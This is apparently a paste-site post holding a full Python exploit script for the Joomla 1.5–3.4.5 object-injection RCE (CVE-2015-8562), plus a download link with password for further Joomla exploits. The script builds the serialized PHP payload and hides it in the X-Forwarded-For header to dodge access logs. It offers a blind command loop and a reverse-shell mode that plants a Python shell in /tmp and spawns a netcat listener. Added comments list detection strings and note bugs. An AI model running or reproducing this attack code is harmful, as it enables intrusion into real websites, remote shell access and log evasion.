iscomsa

Joomla 1.5 - 3.4.5 - RCE

Apr 4th, 2016
  1. other vuln joomla :
  2. Links: http://pan.baidu.com/s/1hqWbGGk Password: 27hj
  3. own install Python environment
  4. Source article: http: //www.t00ts.net/post-304.html
  5.  
  6. #!/usr/bin/env python
  7.  
  8. # Exploit Title: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header
  9. # Date: 12/17/2015
  10. # Exploit Author: original - Gary@ Sec-1 ltd, Modified - Andrew McNicol BreakPoint Labs (@0xcc_labs)
  11. # Vendor Homepage: https://www.joomla.org/
  12. # Software Link: http://joomlacode.org/gf/project/joomla/frs/
  13. # Version: Joomla 1.5 - 3.4.5
  14. # Tested on: Ubuntu 14.04.2 LTS (Joomla! 3.2.1 Stable)
  15. # CVE : CVE-2015-8562
  16.  
  17.  
  18. '''
  19. Joomla 1.5 - 3.4.5 Object Injection RCE - CVE-2015-8562
  20. PoC for CVE-2015-8562 to spawn a reverse shell or automate RCE
  21.  
  22. Original PoC from Gary@ Sec-1 ltd (http://www.sec-1.com):
  23. https://www.exploit-db.com/exploits/38977/
  24.  
  25. Vulnerability Info, Exploit, Detection:
  26. https://breakpoint-labs.com/joomla-rce-cve-2015-8562/
  27.  
  28. Exploit modified to use "X-Forwarded-For" header instead of "User-Agent" to avoid default logged to access.log
  29.  
  30. Usage - Automate Blind RCE:
  31. python joomla-rce-2-shell.py -t http://192.168.1.139/ --cmd
  32. $ touch /tmp/newhnewh
  33.  
  34. Usage - Spawn Reverse Shell using Pentestmonkey's Python one-liner and netcat listener on local host:
  35. python joomla-rce-2-shell.py -t http://192.168.1.139/ -l 192.168.1.119 -p 4444
  36. [-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: http://192.168.1.139/
  37. [-] Uploading python reverse shell with LHOST:192.168.1.119 and LPORT:4444
  38. <Response [200]>
  39. [+] Spawning reverse shell....
  40. <Response [200]>
  41.  
  42. Listening on [0.0.0.0] (family 0, port 4444)
  43. $ python -c "import pty;pty.spawn('/bin/bash')"
  44. www-data@ubuntu:/$ id
  45. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  46. www-data@ubuntu:/$
  47.  
  48. '''
  49.  
  50. import requests
  51. import subprocess
  52. import argparse
  53. import sys
  54. import base64
  55.  
  56. # Heavy lifting from PoC author Gary@ Sec-1 ltd (http://www.sec-1.com)
def get_url(url, user_agent):
    """Send the serialized payload to *url* and return the last HTTP response.

    Despite its name, ``user_agent`` is the payload string: it is placed in
    the ``x-forwarded-for`` request header, while ``User-Agent`` is a fixed
    iPhone string (the header note above gives the reason). A log review
    keyed on User-Agent therefore does not show the injected data; the
    X-Forwarded-For value is where it appears.

    One initial GET collects session cookies, then the same request is sent
    three more times with those cookies. Only the final ``requests.Response``
    is returned; any ``requests`` exception propagates to the caller.
    """

    headers = {
        'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3', # Change default UA for Requests
        'x-forwarded-for': user_agent # X-Forwarded-For header instead of UA
    }
    # The first request is only used to obtain the session cookie jar.
    cookies = requests.get(url,headers=headers).cookies
    # Three identical replays with the cookies; `response` ends up holding
    # whatever the last iteration produced.
    for _ in range(3):
        response = requests.get(url, headers=headers,cookies=cookies)
    return response
  67.  
  68.  
def php_str_noquotes(data):
    """Encode *data* as a PHP ``chr(..).chr(..)`` expression.

    Every character becomes ``chr(<ordinal>)`` and the pieces are joined
    with PHP's ``.`` concatenation operator, so the resulting PHP source
    contains no quote characters. An empty input yields an empty string.
    """
    pieces = ["chr({0})".format(ord(ch)) for ch in data]
    return ".".join(pieces)
  76.  
  77.  
def generate_payload(php_payload):
    """Embed *php_payload* in the CVE-2015-8562 serialized-object string.

    *php_payload* is first rewritten as ``eval(chr(..).chr(..)...)`` via
    ``php_str_noquotes`` so the PHP source carries no quote characters that
    would break the surrounding serialized string. The fixed part of the
    template names ``JDatabaseDriverMysqli``, ``JSimplepieFactory``,
    ``SimplePie`` and ``JDatabaseDriverMysql``, sets ``cache_name_function``
    to ``assert`` and places the injected text in the ``feed_url`` slot,
    followed by ``JFactory::getConfig();exit``. Those literal substrings and
    the four-byte terminator are present in every request this script sends,
    so they are the obvious strings to match on when looking for this traffic
    in proxy or web-server logs.

    Returns the complete string that ``get_url`` puts in the request header.
    Written for Python 2 (see the ``print`` statements in ``main``), where
    ``terminate`` is a plain 4-byte ``str``.
    """

    # Quote-free PHP: eval(chr(..).chr(..)...) of the caller's snippet.
    php_payload = "eval({0})".format(php_str_noquotes(php_payload))

    terminate = '\xf0\xfd\xfd\xfd';
    exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
    injected_payload = "{};JFactory::getConfig();exit".format(php_payload)
    # The serialized string length field (s:N:"...") is computed from the
    # injected text so the object graph stays well-formed.
    exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
    exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate

    return exploit_template
  89.  
  90.  
def main():
    """Parse command-line arguments and run one of two modes.

    ``--cmd`` loops forever reading a command from stdin and sending it as
    ``system('<cmd>')``; nothing is read back from the target, so only the
    ``requests`` response object is printed, not the command output.

    ``-l``/``-p`` runs a two-stage sequence: stage 1 writes a base64-decoded
    Python reverse-shell script to ``/tmp/newhnewh.py`` on the target and
    stage 2 runs it with ``python``; in between, a local ``gnome-terminal``
    running ``nc -lvp <LPORT>`` is started. Seen from the target, the
    artefacts are the file ``/tmp/newhnewh.py``, an ``echo ... | base64 -d``
    shell pipeline, and a ``python /tmp/newhnewh.py`` process holding an
    outbound TCP connection to LHOST:LPORT.

    Python 2 only (``print`` statement, ``raw_input``).
    """
    # NOTE: the description's "CVE-2015-8652" differs from CVE-2015-8562,
    # which is the identifier used everywhere else in this file.
    parser = argparse.ArgumentParser(prog='cve-2015-8562.py', description='Automate blind RCE for Joomla vuln CVE-2015-8652')
    parser.add_argument('-t', dest='RHOST', required=True, help='Remote Target Joomla Server')
    parser.add_argument('-l', dest='LHOST', help='specifiy local ip for reverse shell')
    parser.add_argument('-p', dest='LPORT', help='specifiy local port for reverse shell')
    parser.add_argument('--cmd', dest='cmd', action='store_true', help='drop into blind RCE')

    args = parser.parse_args()

    if args.cmd:
        print "[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {}".format(args.RHOST)
        print "[-] Dropping into shell-like environment to perform blind RCE"
        # Infinite loop; leaves only via EOF/KeyboardInterrupt from raw_input
        # or an exception out of get_url.
        while True:
            command = raw_input('$ ')
            cmd_str = "system('{}');".format(command)
            pl = generate_payload(cmd_str)
            print get_url(args.RHOST, pl)

    # Spawn Reverse Shell using Netcat listener + Python shell on victim
    # NOTE(review): this condition tests LPORT twice and never LHOST.
    elif args.LPORT and args.LPORT:
        connection = "'{}', {}".format(args.LHOST, args.LPORT)

        # pentestmonkey's Python reverse shell one-liner:
        shell_str = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('''+connection+'''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'''
        # Base64 encoded the Python reverse shell as some chars were messing up in the exploit
        encoded_comm = base64.b64encode(shell_str)
        # Stage 1 payload Str
        payload = "echo {} | base64 -d > /tmp/newhnewh.py".format(encoded_comm)
        print "[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {}".format(args.RHOST)
        print "[-] Uploading python reverse shell with LHOST {} and {}".format(args.LHOST, args.LPORT)
        # Stage 1: Uploads the Python reverse shell to "/tmp/newhnewh.py"
        pl = generate_payload("system('"+payload+"');")
        print get_url(args.RHOST, pl)
        # Spawns Shell listener using netcat on LHOST
        # NOTE: `listener` is never waited on or closed by this script.
        listener = subprocess.Popen(args=["gnome-terminal", "--command=nc -lvp "+args.LPORT])
        print "[+] Spawning reverse shell...."
        # Stage 2: Executes Python reverse shell back to LHOST:LPORT
        pl = generate_payload("system('python /tmp/newhnewh.py');")
        print get_url(args.RHOST, pl)
    else:
        print '[!] missing arguments'
        parser.print_help()
  133.  
  134.  
if __name__ == '__main__':
    # Script entry point; importing the module defines functions only.
    main()